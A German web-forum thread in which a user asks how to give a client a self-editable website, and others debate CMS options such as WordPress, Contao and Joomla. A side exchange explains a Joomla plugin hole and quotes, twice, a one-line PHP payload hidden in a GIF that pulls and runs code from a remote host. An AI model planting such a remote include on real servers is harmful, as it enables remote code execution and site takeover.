Inhalte der Webseite die der Inhaber selber erstellen und ändern kann?

[Experiment_57]

Also jemand hätte gerne eine Webseite von mir, die für mich etwas aufwändig erscheint:

Ich sollte für den Typen eine schöne Webseite machen die er später seine Inhalte ändern kann. Ich dachte zunächt an PHP-Skripte.

Besonders schwierig stelle ich mir vor, wenn er die Links-Buttons selber erstellen will, so dass automatisch für diese Buttons eine neue Seite erstellt wird, worin ein Layout schon fertig generiert ist, so dass er nur neue Bilder und Inhalte hinzufügen muss. Und das ganze will er noch ein bißchen interaktiv, was ich nur von Flash kenne.

Könnt ihr mir Tipps geben?

 

[Kausalat]

Wie wäre es mit einem CMS in Verbindung mit einem entsprechenden Template?

Was genau stellt sich die Person unter "interaktiv" vor?

 

[Roan]

Sry wenn ich das so offen sage.

Du scheinst mir selbst keine Ahnung zu haben also warum beauftragt Dich jemand eine Website zu machen?

Und damit es nicht so gemein von mir ist gebe ich Dir hier mal nen Tip wie das ganz einfach geht: CMS

 

[benneq]

Scheinbar hat der TE wenig(/keine) Ahnung von PHP und/oder JavaScript.

Ich würde spontan ein Typo3 oder Drupal "aufsetzen". D.h. im Prinzip: 1. entpacken, 2. ein wenig in der GUI rumklicken, 3. Fertig

 

[Experiment_57]

ich habe schon Ahnung von PHP aber selbst dann ist es zu aufwendig um mal eben so schnell eine Webseite nach seiner Vorstellung zu erstellen. Ich habe mal Joomla glaub ich mal ausprobiert doch dieser läuft extrem langsam auf meinem Rechner. Vlt hab ich doch mit etwas verwechselt. Aber um das mal zu installieren muss man sicherstellen dass der Server auch alle Funktionen anbietet und das tun meiner Meinung nach die meisten Provider nicht.

Interaktiv meint er, dass Bilder die er hinzugefügt hat, sich seitlich reinbewegen. Auf Scrollbar nach Flash-Funktion laufen. All das muss irgendwie generiert sein.

 

[pseudo]

Wenn es auf diesem Niveau sein soll, dann wäre Worpress sicherlich das sinnvollste CMS. Es ist wirklich einfach zu bedienen und zu erweitern. Typo3, Joomla und möglicherweise auch Drupal erfordern etwas mehr Kenntnis. Was sie dadurch aber nicht schlechter macht. Nur, für dein anvisiertes Level wäre Worpress derzeit die bessere Alternative.

 

[Daaron]

Interaktiv meint er, dass Bilder die er hinzugefügt hat, sich seitlich reinbewegen. Auf Scrollbar nach Flash-Funktion laufen. All das muss irgendwie generiert sein.

Nennt sich Slider, gibt für jedes ordentliche CMS passende Plugins.

Wenn es auf diesem Niveau sein soll, dann wäre Worpress sicherlich das sinnvollste CMS.

Wordpress als CMS... na ja. Die Ergebnisse sehe ich häufiger im Netz:
- Sicherheitsprobleme
- langsam
- unsinniger Speicherhunger
- sieht alles gleich aus, weil alle dieselben free themes nutzen

Das meiner Meinung nach beste CMS für kleine bis mittelgroße Seiten ist Contao. Joomla liegt da fast auf Augenhöhe, ist aber etwas komplexer. Drupal ist zu fett für die meisten Anwendungen. TYPO3 ist eh ein mörderisches Machwerk.

 

[pseudo]

Ok, Contao kenne ich nicht, könnte also sein, dass es besser geeignet ist. Doch was Sicherheitsprobleme und Speicherhunger betrifft, sind alle von dir genannten CMS gleich schlecht. Erst heute macht wieder eine Sicherheitslücke auf unzähligen Joomla-Webseiten die Runde, zumindest wird darüber berichtet. Ich selbst hatte auch schon das Vergnügen Opfer eines Massenhacks zu werden. Bei allen anderen CMS ist es bisher nicht anders gewesen.

Je komplexer die Anwendung, desto größer die Angriffsfläche. Und gerade im Zusammenhang mit dem Flickenteppich PHP ist es auch so gut wie unmöglich eine wenigstens einigermaßen sichere Webanwendung zu erstellen.

 

[BlubbsDE]

Was Du das gelesen hast, das bezieht sich nicht auf Joomla direkt.

Sondern auf ein Plugin.

Und wie auch beim Rechner. Sicherheitsupdates sollten unverzüglich eingespielt werden, nutzt man so ein CMS.

Hätten User des Plugins dies getan, hätten sie keine Probleme.

 

[ice-breaker]

Auch wenn ich Joomla nicht ganz so mag (erscheint immer künstlich verkompliziert) muss man Joomla zu gute halten, dass diese Sicherheitslücke wiedermal durch eine Erweiterung eines dritten Entwicklers geöffnet wurde. Also wie bei 99% aller Sicherheitlücken bei einem CMS.

Das die Sicherheitslücken an PHP liegen sollen, widerspreche ich aber vehement. Unfähige Entwickler schaffen in jeder Sprache es mehr Sicherheitslücken als Features in ein Produkt einzubauen. Wirklich gute Entwickler haben auch kein Problem mit Sicherheitlücken, und da ist die Sprache vollkommen egal. Und der Joomla-Bug ist wieder so ein Beispiel für Unfähigkeit: Ein Bilderupload bei dem die hochgeladene Datei durch den PHP-Interpreter gejagt werden kann ist eben ein Garant für eine Sicherheitlücke. Das weiß auch jeder Anfänger und wäre mit nichtmal 5 Minuten Arbeit nicht möglich gewesen, aber dann würde es ja eines guten Entwickler bedürfen...

 

[Daaron]

Ich versteh gar nicht, WIESO man eine GIF in irgend einer Form in einen Interpreter jagen kann. GIF geht via POST rein, wird als BLOB in der Datenbank oder Datei im Upload-Ordner gespeichert und dann später per URL angesprochen...
Falls die GIF noch n Resize oder sowas braucht, dann läuft sowas über GDLib oder Imagick, die haben aber solche Lücken nicht.

 

[ice-breaker]

Daaron das Problem ist ein anderes
Ich vermute, dass die Gif-Datei präperiert war und in irgendwelchen Meta-Daten oder sonstigen Stellen, die auch bei einem Gdlib/Imagick verkleinern usw. erhalten bleiben, PHP Code enthalten war.
Also ein einfaches <?php require('http://a.xyz/a') ?>.
Die Datei war dann wieder normal aus dem Netz erreichbar, da sie irgendwo im DocRoot liegt (spricht ja nix dagegen) ABER für den Ordner war der PHP-Interpreter nicht deaktiviert. Also konnte man über einen solchen Umweg PHP Code in das System einschleusen.

Alles keine neue Lücke, gibt es schon seit mind. 8 Jahren, aber es ist eben kein weltbekannter Angriff wie XSS oder SQL-Injection, womit Entwickler, die sich nicht mit so Sicherheit beschäftigen, diesen Angriff nicht kennen. Und peng, hat man wieder eine Lücke aufgestoßen.

 

[Experiment_57]

ich glaube die hier genannten Beispiele als "CMS" sind alle überdimensioniert.

ich befürchte dass der Inhaber auch mit solchen Backend Seiten etwas überfordert wäre.

Eigentlich reichen nur zwei Buttons: Neues Button in Menü erzeugen (link zu dieser seite wird automatisch generiert) und eine Lösch-Funktion. Und in der neu erzeugten Seite gibt es 6 Platzhalter für Bilder die er selber importieren möchte und ein Platzhalter für ein Text die er selber schreiben kann.

Für sowas braucht man doch nicht gleich MySQL, sondern nur PHP.

Ich kann zwar MySQL Datenbank einrichten, und CMS konfigurieren, aber die sind wie gesagt alle überdimensioniert. Schon die Sache mit Templates ist irgendwie nervig. Ich möchte nur ein PHP-skript der einfach eine Datei ausliest, wieviele Links es geben soll, Namen und was in href= reinkommt. Dann ein Button für eine automatische Generierung neuer Seite. Das mit Bilder uploaden-Funktion via Browser stelle ich mir kompliziert vor. Gut vlt bin ich auch zu faul. ich hätte nie gedacht dass man mit bißchen Dynamik gleich ganz viel Programmieren muss oder ganze CMS-Pakete hernehmen muss.

 

[Daaron]

Also ein einfaches <?php require('http://a.xyz/a') ?>.
Die Datei war dann wieder normal aus dem Netz erreichbar, da sie irgendwo im DocRoot liegt (spricht ja nix dagegen) ABER für den Ordner war der PHP-Interpreter nicht deaktiviert. Also konnte man über einen solchen Umweg PHP Code in das System einschleusen.

Ich steig trotzdem nicht dahinter. Der PHP-Interpreter zündet doch in Abhängigkeit mit dem Dateinamen. Regulär reagiert er auf .php, evtl. noch auf .phtml. Wenn man die .htaccess (im Falle von Apache) manipuliert kann man auch andere Endungen auf den Interpreter schicken.
Eine .gif wird , wie eine .jpg oder auch .html, nie vom Interpreter erfasst, außer man zwingt ihn auf brutalste Weise (was wenigstens einen FTP-Login erfordert).

Für sowas braucht man doch nicht gleich MySQL, sondern nur PHP.

Und wohin speicherst du die neu erstellten Buttons? Um eine Form von Datenhaltung kommst du nicht drumrum... und zwar navigierbare Datenhaltung. XML oder SQL sind sinnvolle Wege.

Ich kann zwar MySQL Datenbank einrichten, und CMS konfigurieren, aber die sind wie gesagt alle überdimensioniert. Schon die Sache mit Templates ist irgendwie nervig. Ich möchte nur ein PHP-skript der einfach eine Datei ausliest, wieviele Links es geben soll, Namen und was in href= reinkommt. Dann ein Button für eine automatische Generierung neuer Seite. Das mit Bilder uploaden-Funktion via Browser stelle ich mir kompliziert vor. Gut vlt bin ich auch zu faul. ich hätte nie gedacht dass man mit bißchen Dynamik gleich ganz viel Programmieren muss oder ganze CMS-Pakete hernehmen muss.

Doch, für das "bisschen" Dynamik müsstest du deutlich länger programmieren, als du bei an Einarbeitungszeit in eine kompaktes CMS benötigst. Du kannst ja auch einen Blick auf CMSimple oder sowas werfen, die kommen teilweise sogar ohne SQL-Datenbank aus (speichern wohl als XML oder so).

Und was Templates angeht: Hast du bei Contao nicht... zumindest nicht in der klassischen Form wie bei Joomla oder TYPO3. Einzelne Module KÖNNEN vom Standard abweichende Templates haben, müssen aber eher selten. Du regelst den Aufbau der Seite rein über die Reihenfolge der Content Elemente und Module. Der Rest ist CSS.

 

[pseudo]

Warum benutzt du nicht einen dieser Homepage-Baukästen? Abhängig vom Anbieter, z.B. 1und1, ist so ein Teil schon im Tarif mit enthalten. Kann man sich alles zusammenklicken.

 

[Speedy.]

Weil Homepage-Baukästen Müll sind.